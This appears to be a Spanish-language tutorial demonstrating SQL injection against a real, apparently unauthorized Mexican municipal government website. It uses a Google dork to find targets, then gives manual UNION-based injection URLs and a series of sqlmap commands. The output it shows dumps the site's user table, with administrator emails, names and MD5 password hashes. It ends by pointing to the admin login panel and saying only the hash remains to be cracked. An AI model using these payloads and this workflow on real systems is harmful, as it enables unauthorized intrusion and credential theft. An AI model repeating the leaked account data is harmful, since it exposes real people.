Probaremos la herramienta sqlmap, para ello buscaremos una web que nos sea de utilidad..
Vamos a google e iniciemos la busqueda: site:mx pasteleria inurl:”.php?id=”
Dentro del listado vi una que me agrado; https://***.gob.mx/
Comprobamos que es vulnerable con https://***.gob.mx/boletines.php?id=3887 and 1=0 y https://***.gob.mx/boletines.php?id=3887 and 1=1
como vimos si es vulnerable entonces ahora buscamos cuantas columnas hay con https://***.gob.mx/boletines.php?id=3887 order by 27 y nos damos cuenta que hay 27 columnas
https://***.gob.mx/boletines.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27–
———————-
https://***.gob.mx/boletines.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(email,0x3a,password,0x3a,status),19,20,21,22,23,24,25,26,27%20from%20usuarios%20limit%201,1–
———————-
Bueno mejor usemos ya sqlmap que lo podemos descargar de http://sqlmap.org/ junto con python https://www.python.org/downloads/
Si estamos en windows abrimos la consola y nos cambiamos a la carpeta de python y ejecutamos el escaneo con sqlmap:
C:\Python27>python C:\Users\0x\Desktop\sqlm\sqlmap.py -u “https://chimalhuacan.gob.mx/boletines.php?id=3887” –batch –banner
Después vemos las bases de datos:
C:\Python27>python C:\Users\0x\Desktop\sqlm\sqlmap.py -u “https://***.gob.mx/boletines.php?id=3887” –batch –dbs
[00:16:12] [INFO] retrieved: ‘***’
[00:16:14] [INFO] retrieved: ‘***’
Ahora sus tablas:
C:\Python27>python C:\Users\0x\Desktop\sqlm\sqlmap.py -u “https://***.gob.mx/boletines.php?id=3887” –batch –tables -D ***
Database: ***
[8 tables]
+—————-+
| Contacto |
| Contenidos |
| Micrositios |
| Recursos |
| banners |
| fwsdocs |
| fwsdocs_folder |
| usuarios |
+—————-+
Veamos los datos de usuarios:
Database: ****
Table: usuarios
[4 entries]
+——+————+—————————————-+———-+——————–+————+————————————-+————+———————+——————————————–+
| ids1 | id_usuario | email | status | acceso | vdesde | nombre | vhasta | ult_sesion | password |
+——+————+—————————————-+———-+——————–+————+————————————-+————+———————+——————————————–+
| NULL | 1 | [email protected] | Inactivo | Atencion Ciudadana | 2017-02-21 | Acceso Demo | 2025-01-01 | 2017-11-10 16:13:09 | 2e771fe4f4354532dbc49c9c9a45e81f (*******) |
| NULL | 6 | webadmin@***.gob.mx | Activo | Administrador | 2017-02-11 | Admin Municipio | 2025-02-11 | 2020-06-19 17:23:20 | 7521e4a3f348ecce94e7c6b5ce440d90 |
| NULL | 7 | [email protected] | Activo | Administrador | 2017-02-11 | Alejandro Cortes | 2025-02-11 | 2020-06-15 15:49:17 | 8e3a4fe0f82a1685bdeccedee8bda94e
webadmin@***.gob.mx7521e4a3f348ecce94e7c6b5ce440d90Activo
Buscamos el panel, en este caso:
https://***.gob.mx/Olimpo/login.php
y solo queda crackear el hash md5 7521e4a3f348ecce94e7c6b5ce440d90